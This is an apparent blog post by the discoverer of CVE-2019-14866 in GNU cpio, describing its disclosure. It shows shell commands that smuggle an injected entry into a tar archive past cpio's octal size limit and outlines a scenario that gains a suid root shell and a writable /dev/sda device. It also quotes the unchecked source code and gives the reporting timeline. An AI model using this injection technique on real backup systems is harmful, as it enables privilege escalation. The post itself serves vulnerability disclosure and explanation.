CVE 2019-14866: GNU cpio
I found a security bug in GNU cpio and thought I’d write down the story of that. It’s not the most interesting bug in the world, but it may still be an interesting story to some.
An odd limit
The whole thing started with me looking at the manpage
-H, --format=FORMAT
Use given archive FORMAT. Valid formats are (the number in
parentheses gives maximum size for individual archive member):
bin The obsolete binary format. (2147483647 bytes)
odc The old (POSIX.1) portable format. (8589934591 bytes)
newc The new (SVR4) portable format, which supports file
systems having more than 65536 i-nodes. (4294967295 bytes)
crc The new (SVR4) portable format with a checksum added.
tar The old tar format. (8589934591 bytes)
ustar The POSIX.1 tar format. Also recognizes GNU tar archives, which are
similar but not identical. (8589934591 bytes)
hpbin The obsolete binary format used by HPUX's cpio (which stores device
files differently).
hpodc The portable format used by HPUX's cpio (which stores device files
differently).
What’s wrong with this picture? Those are some very odd size
limits. 2GiB and 4GiB I understand, as it’s 32bit signed and unsigned
int. But tar
having a max size of 8GiB? 33 bits? That doesn’t make
any sense.
I was lucky finding this because some versions of the manpage doesn’t have this info. E.g. this and this.
Turns out the tar
header format stores file size in 12
bytes, as a string… in octal! There are variants and extensions,
but long story short that’s the common limit.
That’s… terrible. But it’s a format from the stone age, so maybe can be forgiven.
I wonder what happens if you exceed that limit… oh… oh no
$ dd if=/dev/zero seek=16G bs=1 count=0 of=testfile.dat
$ echo testfile.dat | cpio -H tar -o | tar tf -
-rw-r--r-- 1000/1000 0 2019-11-07 13:04 testfile.dat
^^^^\--- That's the size according to tar.
$ echo testfile.dat | cpio -H tar -o | wc -c
17179870720
^^^^^^^^^^^\-- That's the total size of the tar file file.
oh no. The tar
format is a series of “hey, here comes a file named
X, that’s Y bytes long, after those Y bytes I’ll tell you about the
next file”.
I’ve generated a tar
file that says “hey, here comes a file named
testfile.dat that’s 0 bytes long. After those 0 bytes comes another
file header.”
This means I can make cpio
read data (contents of file it reads),
and write it as if it’s metadata (a tar
header):
$ tar cf suffix.tar AUTHORS # Create some payload.
$ dd if=/dev/zero seek=16G bs=1 count=0 of=suffix.tar # Pad it to "look like" 0 bytes.
$ echo suffix.tar | cpio -H tar -o | tar tvf - # Feed it to cpio.
-rw-r--r-- 1000/1000 0 2019-08-30 16:40 suffix.tar
-rw-r--r-- thomas/thomas 161 2019-08-30 16:40 AUTHORS
The point here is that cpio
was fed one file (suffix.tar) to put
into the tar file, but it put two files in there. cpio
never read
AUTHORS
, and it should not be listed.
But so what?
The above is obviously wrong, but how is it a security issue?
It’s a security issue because it’s not just the contents of the injected files that can have arbitrary content, but also the type of file, owner, and suid bits.
I could prepare a payload tar
file that contains a suid root shell,
and a /dev/sda
block device.
evil$ # 1) Prep payload
evil$ ./generate_evil_data --out /home/evil/foo.tar
root# # 2) root user performs backup
root# find /home -print0 | cpio -0 -H tar -o > /var/backup/h.tar
root# # 3) root user restores
root# cd /
root# tar xf /var/backup/h.tar /home/evil/
evil$ # 4) evil user uses newly created rootshell, or writes to /dev/sda
evil$ ls -l /home/evil/
srwxr-xr-x 1 evil evil 61176 Aug 3 2018 /home/evil/rootshell
brw-rw---- 1 evil evil 8, 0 Oct 7 11:21 /home/evil/sda-pwned
evil$ /home/evil/rootshell
# id
uid=0(root) gid=0(root) groups=0(root)
Finding the code culprit
static void // [no error checking]
to_oct(long value, […])
{
[… write up to 11 octal ascii bytes as possible, plus NUL byte,
not checking if `value` didn't fit …]
}
[…]
void // [no error checking]
write_out_tar_header (struct cpio_file_stat *file_hdr, int out_des)
[…]
write_out_header([…])
[…]
write_out_tar_header (file_hdr, out_des); /* FIXME: No error checking */
return 0; // [0 means success]
That “FIXME” is in the original, and appears to have been there since at least 1994.
There may be millions of scripts out there using cpio that are vulnerable.
The tar
format is largely to blame here. It’s a “packet in packet”
attack which could have been prevented if tar
,
like many many other formats and protocols, used a regular
language (also see this talk).
Well the tar
format and a code bug from like 1994.
So is this only GNU, or more implementations?
OpenBSD, as usual, is fine. I’ve not checked other implementations. But it sure is pushing me from Linux to OpenBSD.
Reporting
I reported to the bug-cpio mailing list, being a bit vague describing it only as “hey, that’s surprising output”, hoping to get the patch in early.
10 days with no reply later I emailed the Debian package maintainer and cpio owner directly. No response.
Another week later I started emailing security@debian.org and secalert@redhat.com. Redhat took 10 days to respond. Debian 13 days.
It took a bit of back and forth to explain why this was a security issue, but RedHat eventually created CVE 2019-14866.
On 2019-10-25 the cpio
maintainer creates creates a separate
patch for the problem. It’s multiple changes in one,
which is not great, so for backporting the change to
Debian old and oldold stable the Debian package maintainer chose to go
with my minimal patch (with a 32bit arch fix).
Other links
PS
Oh no, I forgot to give the bug a name, logo, and website. :-(